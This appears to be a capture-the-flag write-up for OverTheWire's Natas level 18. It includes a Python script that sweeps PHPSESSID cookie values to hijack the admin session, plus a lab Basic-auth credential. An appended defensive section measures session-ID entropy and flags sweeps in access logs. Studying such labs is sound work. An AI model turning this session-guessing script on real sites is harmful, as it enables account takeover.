Tuesday, November 11, 2014

Natas 18


Natas 18 looks a bit different from the previous ones:



Looking through the source code, this level doesn't use a database; instead it relies on the PHP session cookie for authentication.



While it's a bit more code than the previous challenges, one thing that sticks out is the comment on the first line: "640 should be enough for everyone".

That's interesting.


If we intercept the POST request that gets sent when we click the Login button, we can see the PHPSESSID cookie is set to 389. That matches what we saw in the source: PHPSESSID values are drawn randomly from values below 640.

Fortunately for us, 640 possible values is far too small a space to be considered secure.

What would happen if we wrote a script that repeatedly sends these login requests, while filling the PHPSESSID cookie value with increasing numbers starting at 0 and going to 640?

Eventually, our PHPSESSID cookie would match the admin's session ID, and we should get his privileges.

I wrote a quick script using the Python requests library:

import sys
import requests

URL = "http://natas18.natas.labs.overthewire.org/index.php"
# The username/password fields are irrelevant here; only the session cookie decides admin status.
PAYLOAD = {"username": "admin", "password": "aa"}

for i in range(700):
    headers = {
        # Try each candidate session ID in turn; the level draws them from values below 640.
        "Cookie": "PHPSESSID={0}".format(i),
        # HTTP basic auth for the natas18 level itself.
        "Authorization": "Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA==",
    }

    r = requests.post(URL, params=PAYLOAD, headers=headers)

    if "You are logged in as a regular user" in r.text:
        print("fail")
    else:
        # A response without the regular-user text means this session ID is the admin's.
        print(r.text)
        sys.exit(0)


You can see it will try successive PHPSESSID values until it eventually doesn't find the text "You are logged in as a regular user" in the response body. (Note the username and password parameters don't really matter...)

Here's the output, and you can see it finishes successfully!
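As an added defender-side example (not code from the original post, and not part of the Natas level itself): the Python below quantifies how small a 640-value session-ID space is compared with a 128-bit identifier, gives the expected cost of a sequential sweep against it, and flags the access-log signature such a sweep leaves, namely one client presenting many distinct PHPSESSID values. The log format, IP addresses and the threshold of 20 are constructed assumptions for the example.

```python
import math
import re
import secrets
from collections import defaultdict

# The scheme from the level: session IDs drawn from 640 possible values.
WEAK_SPACE = 640


def session_entropy_bits(space_size):
    """Entropy (bits) of an id drawn uniformly from `space_size` possible values."""
    return math.log2(space_size)


def expected_guesses_sequential(space_size):
    """Expected tries for a 0..N-1 sweep to hit one fixed target id that is
    uniformly distributed in the space: (N + 1) / 2."""
    return (space_size + 1) / 2


def strong_session_id():
    """A properly generated id: 128 random bits from the OS CSPRNG as 32 hex chars."""
    return secrets.token_hex(16)


# Constructed access-log format: client IP first, the presented session cookie last.
LOG_RE = re.compile(r'^(?P<ip>\S+) .* "PHPSESSID=(?P<sid>[^"]*)"$')


def flag_session_sweeps(log_lines, threshold=20):
    """Return {ip: number_of_distinct_session_ids} for clients that presented more
    than `threshold` distinct PHPSESSID values. A legitimate browser reuses one
    session cookie; cycling through many is the signature of a guessing sweep."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group("ip")].add(m.group("sid"))
    return {ip: len(sids) for ip, sids in seen.items() if len(sids) > threshold}


# Constructed sample log: one client sweeping ids 0..29, one normal client reusing its id.
SAMPLE_LOG = [
    f'10.0.0.5 - - [11/Nov/2014:10:00:{i:02d} +0000] "POST /index.php HTTP/1.1" 200 "PHPSESSID={i}"'
    for i in range(30)
] + [
    f'10.0.0.9 - - [11/Nov/2014:10:01:{i:02d} +0000] "GET /index.php HTTP/1.1" 200 "PHPSESSID=2f1a9c"'
    for i in range(3)
]


if __name__ == "__main__":
    print(f"weak scheme: {session_entropy_bits(WEAK_SPACE):.1f} bits, "
          f"{expected_guesses_sequential(WEAK_SPACE)} expected guesses")
    print(f"strong id:   {session_entropy_bits(16 ** 32):.0f} bits, e.g. {strong_session_id()}")
    print("flagged clients:", flag_session_sweeps(SAMPLE_LOG))
```

The entropy figures make the point numerically: about 9.3 bits versus 128, so the sweep in this post needs on average roughly 320 requests, which is also why `flag_session_sweeps` only needs a modest threshold to catch it in a log.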


